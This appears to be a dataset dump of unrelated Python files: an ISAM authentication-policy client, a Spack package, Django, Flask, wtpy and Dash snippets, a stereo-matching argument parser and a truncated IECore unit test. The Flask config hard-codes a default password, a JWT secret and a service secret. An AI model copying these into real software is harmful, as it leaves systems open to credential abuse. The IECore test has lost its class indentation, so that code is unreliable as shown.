text
stringlengths 2
999k
|
|---|
import logging
logger = logging.getLogger(__name__)
# "uri" variable already used so using a different name
module_uri = "/iam/access/v8/authentication/policies"  # base REST endpoint for authentication policies
requires_modules = ["mga"]  # appliance must have the "mga" (AAC) module activated
requires_version = None  # no minimum firmware version enforced by this module
def get_all(isamAppliance, check_mode=False, force=False):
    """
    Retrieve the complete list of authentication policies from the appliance.

    check_mode and force are accepted for interface symmetry with the other
    functions in this module; a plain GET never changes appliance state.
    """
    return isamAppliance.invoke_get(
        "Retrieve a list of authentication policies",
        module_uri,
        requires_modules=requires_modules,
        requires_version=requires_version,
    )
def get(isamAppliance, name, check_mode=False, force=False):
    """
    Retrieve a specific authentication policy by name.

    Resolves the policy id via search(); when no policy with the given name
    exists an empty return-object is produced instead of an error.
    """
    found = search(isamAppliance, name)
    if found['data'] == {}:
        return isamAppliance.create_return_object()
    return _get(isamAppliance, found['data'])
def _get(isamAppliance, id):
    """
    Retrieve a specific authentication policy by its appliance-assigned id.
    """
    return isamAppliance.invoke_get(
        "Retrieve a specific authentication policy",
        "{0}/{1}".format(module_uri, id),
        requires_modules=requires_modules,
        requires_version=requires_version,
    )
def set_file(isamAppliance, name, policy_file, uri, description="",
             dialect="urn:ibm:security:authentication:policy:1.0:schema", enabled=None, check_mode=False, force=False):
    """
    Read the policy document from a file and delegate to set().

    Newlines are stripped so the policy is sent as a single line.
    """
    with open(policy_file, 'r') as handle:
        policy = handle.read().replace('\n', '')
    return set(isamAppliance, name, policy, uri, description, dialect, enabled, check_mode, force)
def set(isamAppliance, name, policy, uri, description="", dialect="urn:ibm:security:authentication:policy:1.0:schema",
        enabled=None, check_mode=False, force=False):
    """
    Idempotent entry point: create the authentication policy when it does
    not exist, otherwise update the existing one.
    """
    exists = search(isamAppliance, name)['data'] != {}
    if exists:
        return update(isamAppliance, name, policy, uri, description, dialect, enabled, check_mode, force)
    # Not found: add with force=True to skip the redundant existence check.
    return add(isamAppliance, name, policy, uri, description, dialect, enabled, check_mode, True)
def add(isamAppliance, name, policy, uri, description="", dialect="urn:ibm:security:authentication:policy:1.0:schema",
        enabled=None, check_mode=False, force=False):
    """
    Duplicate and create an authentication policy

    No-op when a policy of the same name already exists (unless force).
    The enabled flag is only sent to appliances at firmware 9.0.2.1 or
    later; older appliances get a warning instead.
    """
    # Guard clause: nothing to do when the policy exists and force is off.
    if force is not True and _check(isamAppliance, name=name) is not False:
        return isamAppliance.create_return_object()
    if check_mode is True:
        return isamAppliance.create_return_object(changed=True)
    warnings = []
    json_data = {
        "name": name,
        "description": description,
        "policy": policy,
        "uri": uri,
        "dialect": dialect
    }
    if enabled is not None:
        if isamAppliance.facts["version"] < "9.0.2.1":
            warnings.append(
                "Appliance is at version: {0}. Enabled parameter not supported unless atleast 9.0.2.1. Ignoring value.".format(
                    isamAppliance.facts["version"]))
        else:
            json_data["enabled"] = enabled
    return isamAppliance.invoke_post(
        "Duplicate and create an authentication policy", module_uri, json_data,
        requires_modules=requires_modules, requires_version=requires_version, warnings=warnings)
def delete(isamAppliance, id, check_mode=False, force=False):
    """
    Delete an authentication policy

    No-op when no policy with the given id exists (unless force).
    """
    # Guard clause: nothing to delete when the id is unknown and force is off.
    if force is not True and _check(isamAppliance, id=id) is not True:
        return isamAppliance.create_return_object()
    if check_mode is True:
        return isamAppliance.create_return_object(changed=True)
    return isamAppliance.invoke_delete(
        "Delete an authentication policy",
        "{0}/{1}".format(module_uri, id),
        requires_modules=requires_modules,
        requires_version=requires_version)
def update(isamAppliance, name, policy, uri, description="",
           dialect="urn:ibm:security:authentication:policy:1.0:schema", enabled=None, check_mode=False, force=False):
    """
    Update a specified authentication policy

    Looks up the existing policy by name, compares it against the provided
    values, and only issues a PUT when something actually changed (or when
    force is True).

    Fixes over the original:
    - the policy id is now resolved even when force is True; previously it
      was only assigned inside the comparison branch, so force=True raised
      NameError when building the PUT URL.
    - the bare ``except: pass`` is narrowed to KeyError (the error the
      comparison path can legitimately produce when keys are missing).

    :param enabled: optional enable/disable flag; ignored (with a warning)
        on appliances older than 9.0.2.1.
    """
    warnings = []
    needs_update = False
    json_data = {
        "name": name,
        "description": description,
        "policy": policy,
        "uri": uri,
        "dialect": dialect
    }
    if enabled is not None:
        if isamAppliance.facts["version"] < "9.0.2.1":
            warnings.append(
                "Appliance is at version: {0}. Enabled parameter not supported unless atleast 9.0.2.1. Ignoring value.".format(
                    isamAppliance.facts["version"]))
        else:
            json_data["enabled"] = enabled
    # Resolve the existing policy; its id is required for the PUT URL
    # regardless of force.
    ret_obj = get(isamAppliance, name)
    try:
        id = ret_obj['data']['id']
    except (KeyError, TypeError):
        # No policy with that name exists - nothing to update.
        return isamAppliance.create_return_object(warnings=warnings)
    if force is not True:
        try:
            del ret_obj['data']['id']
            del ret_obj['data']['datecreated']
            del ret_obj['data']['lastmodified']
            del ret_obj['data']['userlastmodified']
            del ret_obj['data']['predefined']
            import ibmsecurity.utilities.tools
            exist_data = ibmsecurity.utilities.tools.json_sort(ret_obj['data'])
            new_data = ibmsecurity.utilities.tools.json_sort(json_data)
            logger.debug("Existing Data: {0}".format(exist_data))
            logger.debug("Provided Data: {0}".format(new_data))
            if exist_data != new_data:
                needs_update = True
        except KeyError:
            # Unexpected payload shape; treat as "no change" - this matches
            # the best-effort behaviour of the original bare except.
            pass
    if force is True or needs_update is True:
        if check_mode is True:
            return isamAppliance.create_return_object(changed=True)
        return isamAppliance.invoke_put(
            "Update a specified authentication policy",
            "{0}/{1}".format(module_uri, id), json_data, requires_modules=requires_modules,
            requires_version=requires_version, warnings=warnings)
    return isamAppliance.create_return_object()
def _check(isamAppliance, id=None, name=None):
    """
    Check if API Protection Definition already exists

    Matches on id and/or name, whichever is provided. Returns a bool.
    """
    existing = get_all(isamAppliance)['data']
    return any(
        (id is not None and entry['id'] == id) or (name is not None and entry['name'] == name)
        for entry in existing
    )
def search(isamAppliance, name, check_mode=False, force=False):
    """
    Retrieve the id for a given policy name

    The returned object's 'data' holds the id on a match and stays an empty
    dict when the name is unknown.
    """
    result = isamAppliance.create_return_object()
    for policy in get_all(isamAppliance)['data']:
        if policy['name'] == name:
            result['data'] = policy['id']
            break
    return result
def activate(isamAppliance, name, enabled=True, check_mode=False, force=False):
    """
    Enable or disable a policy

    On appliances older than 9.0.2.1 the enabled flag is unsupported: a
    warning is returned and nothing is changed.
    """
    warnings = []
    if isamAppliance.facts["version"] < "9.0.2.1":
        warnings.append(
            "Appliance is at version: {0}. Enabled parameter not supported unless atleast 9.0.2.1. Ignoring value.".format(
                isamAppliance.facts["version"]))
        return isamAppliance.create_return_object(warnings=warnings)
    current = get(isamAppliance, name=name)
    # Guard clause: already in the requested state and not forced.
    if not (force or current['data']['enabled'] != enabled):
        return isamAppliance.create_return_object(warnings=warnings)
    if check_mode is True:
        return isamAppliance.create_return_object(changed=True, warnings=warnings)
    return update(isamAppliance, name=name, policy=current['data']['policy'], uri=current['data']['uri'],
                  description=current['data']['description'], dialect=current['data']['dialect'],
                  enabled=enabled)
def compare(isamAppliance1, isamAppliance2):
    """
    Compare Authentication Policies between two appliances

    Each policy's full document is fetched so the 'policy' payload is part
    of the comparison; appliance-specific keys (id, timestamps) are dropped.

    Fixes over the original:
    - the per-policy detail was fetched with ``ret_obj1['data']['id']``
      (a string index into a list, a TypeError) instead of ``obj['id']``,
      and only after the id had already been deleted from the entry;
    - the second loop fetched details from ``ret_obj1`` instead of the
      second appliance's ``ret_obj2``.
    """
    import ibmsecurity.utilities.tools
    ret_obj1 = get_all(isamAppliance1)
    ret_obj2 = get_all(isamAppliance2)
    for obj in ret_obj1['data']:
        # Fetch the full policy document *before* discarding the id.
        detail = _get(isamAppliance1, obj['id'])
        obj['policy'] = detail['data']['policy']
        del obj['id']
        del obj['datecreated']
        del obj['lastmodified']
        del obj['userlastmodified']
    for obj in ret_obj2['data']:
        detail = _get(isamAppliance2, obj['id'])
        obj['policy'] = detail['data']['policy']
        del obj['id']
        del obj['datecreated']
        del obj['lastmodified']
        del obj['userlastmodified']
    return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2,
                                                    deleted_keys=['id', 'datecreated', 'lastmodified',
                                                                  'userlastmodified'])
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Dftfe(CMakePackage):
    """Real-space DFT calculations using Finite Elements"""

    homepage = "https://sites.google.com/umich.edu/dftfe/"
    url = "https://github.com/dftfeDevelopers/dftfe/archive/0.5.1.tar.gz"

    maintainers = ['rmsds']

    # Released versions with verified tarball checksums.
    version('0.6.0', sha256='66b633a3aae2f557f241ee45b2faa41aa179e4a0bdf39c4ae2e679a2970845a1')
    version('0.5.2', sha256='9dc4fa9f16b00be6fb1890d8af4a1cd3e4a2f06a2539df999671a09f3d26ec64')
    version('0.5.1', sha256='e47272d3783cf675dcd8bc31da07765695164110bfebbbab29f5815531f148c1')
    version('0.5.0', sha256='9aadb9a9b059f98f88c7756b417423dc67d02f1cdd2ed7472ba395fcfafc6dcb')

    variant('scalapack', default=True, description='Use ScaLAPACK, strongly recommended for problem sizes >5000 electrons')
    variant('build_type', default='Release',
            description='The build type to build',
            values=('Debug', 'Release'))

    depends_on('mpi')
    # dealii must be built with the full feature set DFT-FE links against;
    # 0.5.1 onwards additionally requires dealii >= 9.0.0.
    depends_on('dealii+p4est+petsc+slepc+int64+scalapack+mpi')
    depends_on('dealii+p4est+petsc+slepc+int64+scalapack+mpi@9.0.0:', when='@0.5.1:')
    depends_on('scalapack', when='+scalapack')
    depends_on('alglib')
    depends_on('libxc')
    depends_on('spglib')
    depends_on('libxml2')

    def cmake_args(self):
        """Assemble the -D definitions pointing CMake at MPI wrappers and
        the prefixes of the numeric/XML dependencies."""
        spec = self.spec
        args = [
            '-DCMAKE_C_COMPILER={0}'.format(spec['mpi'].mpicc),
            '-DCMAKE_CXX_COMPILER={0}'.format(spec['mpi'].mpicxx),
            '-DALGLIB_DIR={0}'.format(spec['alglib'].prefix),
            '-DLIBXC_DIR={0}'.format(spec['libxc'].prefix),
            '-DXML_LIB_DIR={0}/lib'.format(spec['libxml2'].prefix),
            '-DXML_INCLUDE_DIR={0}/include'.format(spec['libxml2'].prefix),
            '-DSPGLIB_DIR={0}'.format(spec['spglib'].prefix),
        ]
        if spec.satisfies('^intel-mkl'):
            args.append('-DWITH_INTEL_MKL=ON')
        else:
            args.append('-DWITH_INTEL_MKL=OFF')
        if spec.satisfies('%gcc'):
            # older DFT-FE sources need -fpermissive to compile with GCC
            args.append('-DCMAKE_C_FLAGS=-fpermissive')
            args.append('-DCMAKE_CXX_FLAGS=-fpermissive')
        return args

    # Releases up to 0.5.2 have no install target; copy the binary and
    # shared library into place manually.
    @when('@:0.5.2')
    def install(self, spec, prefix):
        mkdirp(prefix.bin)
        mkdirp(prefix.lib64)
        install(join_path(self.build_directory, 'main'),
                join_path(prefix.bin, 'dftfe'))
        install(join_path(self.build_directory, 'libdftfe.so'),
                prefix.lib64)
|
from contextlib import contextmanager
from typing import Iterator, List
from django.db import connection
from .exceptions import DatabaseAccessBlocked
@contextmanager
def block_db() -> Iterator[None]:
    """Context manager that makes every DB query inside the block raise
    DatabaseAccessBlocked, via Django's execute_wrapper hook."""

    def _raise_on_query(*args: List) -> None:
        raise DatabaseAccessBlocked

    with connection.execute_wrapper(_raise_on_query):
        yield
|
# encoding: utf-8
from os import path, getenv
from datetime import timedelta
import ast
basedir = path.abspath(path.dirname(__file__))  # directory containing this config module

class Config (object):
    """Flask application configuration; most values can be overridden via
    environment variables."""
    APP_NAME = getenv('APP_NAME', 'Python Flask Boilerplate')
    # DEV/DEBUG are parsed with ast.literal_eval, so the env var must be a
    # Python literal such as 'True' or 'False'.
    DEV = ast.literal_eval(getenv('DEV', 'True'))
    DEBUG = ast.literal_eval(getenv('DEBUG', 'True'))
    HOST = '0.0.0.0'  # bind on all interfaces
    PORT = 5678
    # NOTE(review): hard-coded default credential - replace before production use.
    USER_DEFAULT_PASSWORD = '123456'
    # Defaults to a local SQLite file next to this module.
    SQLALCHEMY_DATABASE_URI = getenv('SQLALCHEMY_DATABASE_URI', 'sqlite:///' + path.join(basedir, 'db.sqlite'))
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SQLALCHEMY_MIGRATE_REPO = path.join(basedir, 'db', 'db_repository')
    '''Flask-JWT'''
    # NOTE(review): hard-coded signing secret - load from the environment in production.
    SECRET_KEY = 'super-secret'
    JWT_AUTH_URL_RULE = '/signin'
    JWT_AUTH_USERNAME_KEY = 'name'
    JWT_AUTH_PASSWORD_KEY = 'pwd'
    JWT_EXPIRATION_DELTA = timedelta(seconds = 1800)  # tokens valid for 30 minutes
    '''Docker-Network media-service container'''
    MEDIA_SERVICE_RESTFUL_API_URL = getenv('MEDIA_SERVICE_RESTFUL_API_URL', 'http://localhost:8080/index/api')
    # NOTE(review): hard-coded shared secret for the media service - verify rotation policy.
    MEDIA_SERVICE_SECRET = '035c73f7-bb6b-4889-a715-d9eb2d1925cc'
    ### SQLALCHEMY_DATABASE_URI = 'mysql://user:pass@server_ip:server_port/db_name'

current = Config  # active configuration class used by the app factory
|
from wtpy import BaseExtParser
from wtpy import WTSTickStruct
from ctypes import byref
import threading
import time
from wtpy import WtDtEngine
class MyParser(BaseExtParser):
    """Demo external parser that pushes a synthetic CFFEX.IF2106 tick into
    the engine once per second from a background thread."""

    def __init__(self, id: str):
        super().__init__(id)
        self.__worker__ = None  # background thread running random_sim()

    def init(self, engine):
        """
        Initialize the parser with the owning engine.

        Fix: the original signature was ``init(self, engine:WtEngine)``;
        ``WtEngine`` is never imported, so evaluating the annotation raised
        NameError at class-definition time. The annotation is dropped.
        """
        super().init(engine)

    def random_sim(self):
        """Endless loop: build a tick for IF2106@CFFEX and push it to the
        engine every second. Runs on the daemon worker thread."""
        while True:
            curTick = WTSTickStruct()
            curTick.code = bytes("IF2106", encoding="UTF8")
            curTick.exchg = bytes("CFFEX", encoding="UTF8")
            self.__engine__.push_quote_from_extended_parser(self.__id__, byref(curTick), True)
            time.sleep(1)

    def connect(self):
        """Start the connection; spawns the simulator thread exactly once."""
        print("connect")
        if self.__worker__ is None:
            self.__worker__ = threading.Thread(target=self.random_sim, daemon=True)
            self.__worker__.start()
        return

    def disconnect(self):
        """Drop the connection (no-op for the simulator)."""
        print("disconnect")
        return

    def release(self):
        """Release resources; normally invoked on process exit."""
        print("release")
        return

    def subscribe(self, fullCode: str):
        """
        Subscribe to live quotes.
        @fullCode contract code, e.g. CFFEX.IF2106
        """
        # print("subscribe: " + fullCode)
        return

    def unsubscribe(self, fullCode: str):
        """
        Unsubscribe from live quotes.
        @fullCode contract code, e.g. CFFEX.IF2106
        """
        # print("unsubscribe: " + fullCode)
        return
if __name__ == "__main__":
    # Create a data-engine runtime and attach the external parser.
    myParser = MyParser("test")
    engine = WtDtEngine()
    engine.initialize("dtcfg.yaml", "logcfgdt.yaml")  # engine config + logging config
    # NOTE(review): "add_exetended_parser" (sic) matches the wtpy API spelling - do not "fix".
    engine.add_exetended_parser(myParser)
    engine.run()
    # Block until the user presses enter so the daemon threads keep running.
    kw = input('press any key to exit\n')
|
# home.py - app module for Codato home page.
__version__ = '0.1'
__all__ = ['layout', 'callback']
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Static page layout: a centered heading with generous padding.
layout = html.Div([
    html.Br(),
    html.H3('Covid Data Tools'),
],
    style={'padding':'10vw', 'text-align':'center'}
)
def callback(app):
    """Register this page's Dash callbacks on *app* (none needed yet)."""
    return None
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
import torch
import logging
logging.basicConfig(level=logging.INFO, format=' %(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
def get_settings():
    """Parse and return the command-line arguments for the stereo-matching
    program.

    Also derives a few composite fields (``cuda``, ``beta``, ``crop_size``)
    and logs the final settings.

    Fixes over the original: the ``--mode`` help string was missing its
    closing bracket, and several user-facing help typos are corrected
    (maxium/learnig/infomation).
    """
    import argparse
    # local handle; logging.getLogger returns the same module logger instance
    logger = logging.getLogger(__name__)
    parser = argparse.ArgumentParser(description='Deep Stereo Matching by pytorch')
    parser.add_argument('--mode', default='train',
                        help='mode of execution [train/finetune/val/submission]')

    # arguments of datasets
    parser.add_argument('--datas_train', default='k2015-tr, k2012-tr',
                        help='datasets for training')
    parser.add_argument('--datas_val', default='k2015-val, k2012-val',
                        help='datasets for validation')
    parser.add_argument('--dir_datas_train', default='/media/qjc/D/data/kitti/',
                        help='dirpath of datasets for training')
    parser.add_argument('--dir_datas_val', default='/media/qjc/D/data/kitti/',
                        help='dirpath of datasets for validation')
    parser.add_argument('--bn', type=int, default=4,
                        help='batch size')
    parser.add_argument('--crop_width', type=int, default=768,
                        help='width of crop_size')
    parser.add_argument('--crop_height', type=int, default=384,
                        help='height of crop_size')

    # arguments of model
    parser.add_argument('--arch', default='DispNetC',
                        help='select arch of model')
    parser.add_argument('--maxdisp', type=int, default=192,
                        help='maximum disparity')
    parser.add_argument('--loadmodel', default=None,
                        help='path of pretrained weight')

    # arguments of lossfun
    parser.add_argument('--loss_name', default='SV-SL1',
                        help='name of lossfun, supported as follow: \
                             SV-(SL1/CE/SL1+CE), \
                             DUSV-(A[S(1/2/3)]C(1/2)[-AD][-M], \
                             LUSV-(A[S(1/2/3)][-AD])/(AS(1/2/3)-EC)')
    parser.add_argument('--flag_FC', action='store_true', default=False,
                        help='enables feature consistency')
    parser.add_argument('--flag_FCTF', action='store_true', default=False,
                        help='enables the mode of training from coarse to fine')
    parser.add_argument('--mode_down_disp', type=str, default='avg',
                        help='mode of downsample disparity for training with multi-scale [avg/max]')
    parser.add_argument('--mode_down_img', type=str, default='Simple',
                        help='mode of downsample image for training with multi-scale [Simple/Gaussion/DoG]')
    parser.add_argument('--nedge', type=int, default=64,
                        help='margin of image for learning disparity of region with occlution')

    # arguments of optimizer
    parser.add_argument('--freq_optim', type=int, default=1,
                        help='frequent of optimize weight')
    parser.add_argument('--lr', type=float, default=0.001,
                        help='learning rate')
    parser.add_argument('--lr_epoch0', type=int, default=10,
                        help='the first epoch of adjust learning rate')
    parser.add_argument('--lr_stride', type=int, default=3,
                        help='epoch stride of adjust learning rate')
    parser.add_argument('--lr_decay', type=float, default=0.5,
                        help='decay factor of adjust learning rate')
    parser.add_argument('--weight_decay', type=float, default=0.0001,
                        help='decay factor of weight')
    parser.add_argument('--beta1', type=float, default=0.9,
                        help='beta1 of Adam')
    parser.add_argument('--beta2', type=float, default=0.999,
                        help='beta2 of Adam')

    # arguments for training
    parser.add_argument('--epochs', type=int, default=20,
                        help='number of epochs to train')
    parser.add_argument('--nloop', type=int, default=1,
                        help='loop of dataset in a epoch')
    parser.add_argument('--epochs_warmup', type=int, default=0,
                        help='number of epochs to warmup weight')
    parser.add_argument('--freq_save', type=int, default=1,
                        help='frequent of save weight')
    parser.add_argument('--freq_print', type=int, default=20,
                        help='frequent of print information')

    # other arguments
    parser.add_argument('--dir_save', default='./results/',
                        help='dirpath of save result( weight/submission )')
    parser.add_argument('--no-cuda', action='store_true', default=False,
                        help='enables CUDA training')
    parser.add_argument('--seed', type=int, default=1, metavar='S',
                        help='random seed (default: 1)')

    # parser arguments
    args = parser.parse_args()

    # add derived arguments
    args.cuda = (not args.no_cuda) and torch.cuda.is_available()
    args.beta = (args.beta1, args.beta2)
    args.crop_size = (args.crop_width, args.crop_height)

    # log arguments
    items = sorted(args.__dict__.items())
    msg = 'The setted arguments as follow: \n'
    msg += '\n'.join(['  [%s]: %s' % (k, str(v)) for k, v in items])
    logger.info(msg + '\n')
    return args
# program entry
if __name__ == '__main__':
    # parse command-line settings
    args = get_settings()
    # set gpu id used
    os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
    # set manual seed (CPU, and GPU when CUDA is available)
    torch.manual_seed(args.seed)
    if args.cuda:
        torch.cuda.manual_seed(args.seed)
    # ensure the output directory exists
    if(not os.path.isdir(args.dir_save)):
        os.mkdir(args.dir_save)
    # execute the requested stereo sub-program
    import stereo
    if(args.mode.lower() in ['train', 'finetune']):
        stereo.train_val(args)
    elif(args.mode.lower() in ['val', 'validation']):
        stereo.val(args)
    elif(args.mode.lower() in ['sub', 'submission']):
        stereo.submission(args)
    else:
        logger.error('not support mode[ %s ]' % args.mode)
|
##########################################################################
#
# Copyright (c) 2012-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
from IECore import *
class CompoundParameterTest( unittest.TestCase ) :
def testZEndGarbageCollection( self ):
    """Named with a Z so it sorts last: after all other tests have run,
    collecting garbage must leave no wrapped RefCounted instances alive."""
    import gc
    # test if garbage collection is still working after all tests with compound parameters.
    gc.collect()
    RefCounted.collectGarbage()
    self.assertEqual( RefCounted.numWrappedInstances(), 0 )
def testUserDataConstructorEquivalence( self ):
    """userData passed as a CompoundObject and as a plain dict must yield
    equal user data.

    Renamed from ``testUserData``: a second method with that exact name is
    defined further down in this class, which silently shadowed this one so
    it never ran under test discovery.
    """
    p = CompoundParameter( "n", "d", [], userData = CompoundObject( { "test": StringData("hi"), "test2": IntData(2), "test3": CompoundObject( { "test4": FloatData( 1.0 ) } ) } ) )
    p2 = CompoundParameter( "n", "d", [], userData = { "test": StringData("hi"), "test2": IntData(2), "test3": { "test4": FloatData( 1.0 ) } } )
    self.assertEqual( p.userData(), p2.userData() )
def testDerivedClassElement( self ):
    """A python-derived parameter class used as a member must keep its
    derived type when retrieved back from the compound."""
    class DerivedStringParameter( StringParameter ):
        pass
    p = DerivedStringParameter( "a", "a", "contents" )
    c = CompoundParameter( "n", "d", members = [ p ] )
    self.assertEqual( type( c[ "a" ] ), DerivedStringParameter )
def testDerivedClass( self ):
    """A python-derived CompoundParameter may override valueValid(); the
    override is honoured by validate() even when a child (presets-only with
    an empty default) would otherwise reject its value."""
    class DerivedCompoundParameter( CompoundParameter ):
        def valueValid( self, value ) :
            # accept anything
            return ( True, "" )
    p = DerivedCompoundParameter( "n", "d", members = [ StringParameter( "a", "a", "", presets = ( ( "b", StringData( "b" ) ), ), presetsOnly = True ) ] )
    p.validate()
def testConstructor( self ) :
    """Construction: an empty compound (with and without an explicit empty
    member list) and a compound with members."""
    # Both empty constructions must behave identically.
    for p in ( CompoundParameter( "n", "d" ), CompoundParameter( "n", "d", [] ) ) :
        self.assertEqual( p.name, "n" )
        self.assertEqual( p.description, "d" )
        self.assertEqual( p.defaultValue, CompoundObject() )
        self.assertEqual( len( p.keys() ), 0 )
        self.assertEqual( len( p.values() ), 0 )
        self.assertEqual( len( p ), 0 )
        self.assertEqual( p.userData(), CompoundObject() )
    # With members: defaults, sizes and insertion order are all visible.
    p = CompoundParameter(
        name = "compound",
        description = "innit nice",
        members = [
            IntParameter( "i", "d", 1 ),
            FloatParameter( "f", "d", 2 ),
        ]
    )
    expected = CompoundObject()
    expected["i"] = IntData( 1 )
    expected["f"] = FloatData( 2 )
    self.assertEqual( p.name, "compound" )
    self.assertEqual( p.description, "innit nice" )
    self.assertEqual( p.defaultValue, expected )
    self.assertEqual( len( p.keys() ), 2 )
    self.assertEqual( len( p.values() ), 2 )
    self.assertEqual( len( p ), 2 )
    self.assertEqual( p.keys(), ["i", "f"] )
    self.assertEqual( p.values()[0].name, "i" )
    self.assertEqual( p.values()[1].name, "f" )
def testConstDefaultValue( self ):
    """Mutating a value obtained from getValue() must not leak into the
    parameter's default value."""
    a = CompoundParameter( "a", "a desc",
        members = [
            StringParameter( "b", "b desc", "ok"),
        ]
    )
    c = a.getValue()
    c["b"].value = 'error!'
    # the default is unaffected by the mutation above
    self.assertEqual( a["b"].defaultValue.value, "ok")
def testUserData( self ):
    """userData() compares equal to, but is not the same object as, the
    CompoundObject given at construction, and the returned copy is mutable."""
    compound = CompoundObject()
    compound["first"] = IntData()
    compound["second"] = QuatfData()
    compound["third"] = StringData("test")
    p = CompoundParameter( "n", "d", [], userData = compound )
    self.assertEqual( p.userData(), compound )
    # a copy is taken at construction time
    self.assert_(not p.userData().isSame(compound) )
    data = p.userData()
    data["fourth"] = CharData('1')
    data["first"] = data["fourth"]
def testAccess( self ) :
    """Children are reachable both by indexing and via parameter()."""
    p = CompoundParameter(
        name = "compound",
        description = "innit nice",
        members = [
            IntParameter( "i", "d", 1 ),
            FloatParameter( "f", "d", 2 ),
        ]
    )
    self.assertEqual( p["i"].name, "i" )
    self.assertEqual( p.parameter( "i" ).name, "i" )
def testPresets( self ) :
    """Preset adoption: a compound built with adoptChildPresets (the
    default) exposes only preset names common to all children, applies them
    to every child on setValue(), and refuses setPresets()."""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1, presets = (
                ( "one", 1 ),
                ( "two", 2 ),
                ( "ambiguous", 4 ),
                ( "four", 4 ),
                ( "otherAmbiguous", 4 ),
            ),
            presetsOnly = True,
            ),
            FloatParameter( "f", "d", 2, presets = (
                ( "one", 1 ),
                ( "two", 2 ),
                ( "three", 3 ),
                ( "four", 4 ),
            ),
            presetsOnly = True,
            )
        ]
    )
    self.assertEqual( p.presetsOnly, True )
    # only "one", "two" and "four" are shared by both children
    pr = p.getPresets()
    self.assertEqual( len( pr ), 3 )
    self.assert_( "one" in pr.keys() )
    self.assert_( "two" in pr.keys() )
    p.setValue( "two" )
    self.assertEqual( p["i"].getValue().value, 2 )
    self.assertEqual( p["f"].getValue().value, 2 )
    self.assertEqual( p.getCurrentPresetName(), "two" )
    p.setValue( "four" )
    self.assertEqual( p.getCurrentPresetName(), "four" )
    self.assertRaises( RuntimeError, p.setPresets, [] ) # CompoundParameter created with adoptChildPresets=True does not allow overriding presets
    # presetsOnly holds even when the children's preset lists differ in size
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1, presets = (
                ( "one", 1 ),
                ( "two", 2 ),
            ),
            presetsOnly = True,
            ),
            FloatParameter( "f", "d", 1, presets = (
                ( "one", 1 ),
                ( "two", 2 ),
                ( "three", 3 ),
            ),
            presetsOnly = True,
            )
        ]
    )
    self.assertEqual( p.presetsOnly, True )
    # a compound with no children has no presets at all
    p = CompoundParameter(
        name = "c",
        description = "d",
    )
    self.assertEqual( p.presetsOnly, False )
    self.assertEqual( len( p.getPresets() ), 0 )
def testLateValidation( self ) :
    """Validation is lazy: a partial value can be set and completed later;
    an unknown child key makes validation fail until it is removed."""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1 ),
            FloatParameter( "f", "d", 2 )
        ]
    )
    p.validate()
    p.setValue( CompoundObject( { "i" : IntData( 10 ), "f" : FloatData( 20 ) } ) )
    p.validate()
    self.assertEqual( p["i"].getValue(), IntData( 10 ) )
    self.assertEqual( p["f"].getValue(), FloatData( 20 ) )
    # partial value: validation still passes once the child is completed
    p.setValue( CompoundObject( { "i" : IntData( 10 ) } ) )
    p.validate()
    p.getValidatedValue()
    p["f"].setValue( FloatData( 20 ) )
    p.validate()
    # a key with no corresponding child parameter must fail validation
    p.setValue( CompoundObject( { "idontbelong" : IntData( 10 ), "i" : IntData( 10 ), "f" : FloatData( 20 ) } ) )
    self.assertRaises( RuntimeError, p.validate )
    self.assertRaises( RuntimeError, p.getValidatedValue )
    del p.getValue()["idontbelong"]
    p.validate()
def testAddParameters( self ) :
    """addParameters() appends a whole list of children at once."""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = []
    )
    self.assertEqual( len( p ), 0 )
    newMembers = [
        IntParameter( "i", "d", 1 ),
        FloatParameter( "f", "d", 2 )
    ]
    p.addParameters( newMembers )
    self.assertEqual( len( p ), 2 )
def testAddParametersDefault( self ) :
    """Each addParameter() call extends the compound's defaultValue with the
    new child's default."""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = []
    )
    self.assertEqual( p.defaultValue, CompoundObject() )
    p.addParameter( IntParameter( name = "i", description = "d", defaultValue = 10 ) )
    self.assertEqual( len( p.defaultValue ), 1 )
    self.assertEqual( p.defaultValue, CompoundObject( { "i" : IntData( 10 ) } ) )
    p.addParameter( FloatParameter( name = "f", description = "d", defaultValue = 20 ) )
